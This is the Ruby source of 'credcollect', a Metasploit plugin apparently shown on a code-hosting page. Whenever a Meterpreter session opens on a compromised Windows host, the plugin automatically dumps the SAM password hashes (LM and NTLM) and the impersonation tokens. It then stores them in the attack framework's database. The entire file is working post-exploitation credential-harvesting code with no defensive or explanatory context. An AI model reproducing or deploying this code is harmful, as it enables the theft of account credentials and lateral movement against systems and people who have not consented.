Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
# credcollect - tebo[at]attackresearch.com
2

3
module Msf
4
  class Plugin::CredCollect < Msf::Plugin
5
    include Msf::SessionEvent
6

7
    class CredCollectCommandDispatcher
8
      include Msf::Ui::Console::CommandDispatcher
9

10
      def name
11
        'credcollect'
12
      end
13

14
      def commands
15
        {
16
          'db_hashes' => "Dumps hashes (deprecated: use 'creds -s smb')",
17
          'db_tokens' => "Dumps tokens (deprecated: use 'notes -t smb_token')"
18
        }
19
      end
20

21
      def cmd_db_hashes
22
        print_error ''
23
        print_error "db_hashes is deprecated. Use 'creds -s smb' instead."
24
        print_error ''
25
      end
26

27
      def cmd_db_tokens
28
        print_error ''
29
        print_error "db_tokens is deprecated. Use 'notes -t smb_token' instead."
30
        print_error ''
31
      end
32

33
    end
34

35
    def on_session_open(session)
36
      return if !framework.db.active
37

38
      print_status('This is CredCollect, I have the conn!')
39

40
      if (session.type == 'meterpreter')
41

42
        # Make sure we're rockin Priv and Incognito
43
        session.core.use('priv')
44
        session.core.use('incognito')
45

46
        # It wasn't me mom! Stinko did it!
47
        hashes = session.priv.sam_hashes
48

49
        # Target infos for the db record
50
        addr = session.sock.peerhost
51
        # This ought to read from the exploit's datastore.
52
        # Use the meterpreter script if you need to control it.
53
        smb_port = 445
54

55
        # Record hashes to the running db instance
56
        hashes.each do |hash|
57
          data = {}
58
          data[:host] = addr
59
          data[:port] = smb_port
60
          data[:sname] = 'smb'
61
          data[:user] = hash.user_name
62
          data[:pass] = hash.lanman + ':' + hash.ntlm
63
          data[:type] = 'smb_hash'
64
          data[:active] = true
65

66
          framework.db.report_auth_info(data)
67
        end
68

69
        # Record user tokens
70
        tokens = session.incognito.incognito_list_tokens(0).values
71
        # Meh, tokens come to us as a formatted string
72
        tokens = tokens.join.strip!.split("\n")
73

74
        tokens.each do |token|
75
          data = {}
76
          data[:host] = addr
77
          data[:type] = 'smb_token'
78
          data[:data] = token
79
          data[:update] = :unique_data
80

81
          framework.db.report_note(data)
82
        end
83
      end
84
    end
85

86
    def on_session_close(session, reason = ''); end
87

88
    def initialize(framework, opts)
89
      super
90
      self.framework.events.add_session_subscriber(self)
91
      add_console_dispatcher(CredCollectCommandDispatcher)
92
    end
93

94
    def cleanup
95
      framework.events.remove_session_subscriber(self)
96
      remove_console_dispatcher('credcollect')
97
    end
98

99
    def name
100
      'db_credcollect'
101
    end
102

103
    def desc
104
      'Automatically grab hashes and tokens from Meterpreter session events and store them in the database'
105
    end
106

107
  end
108
end
109

110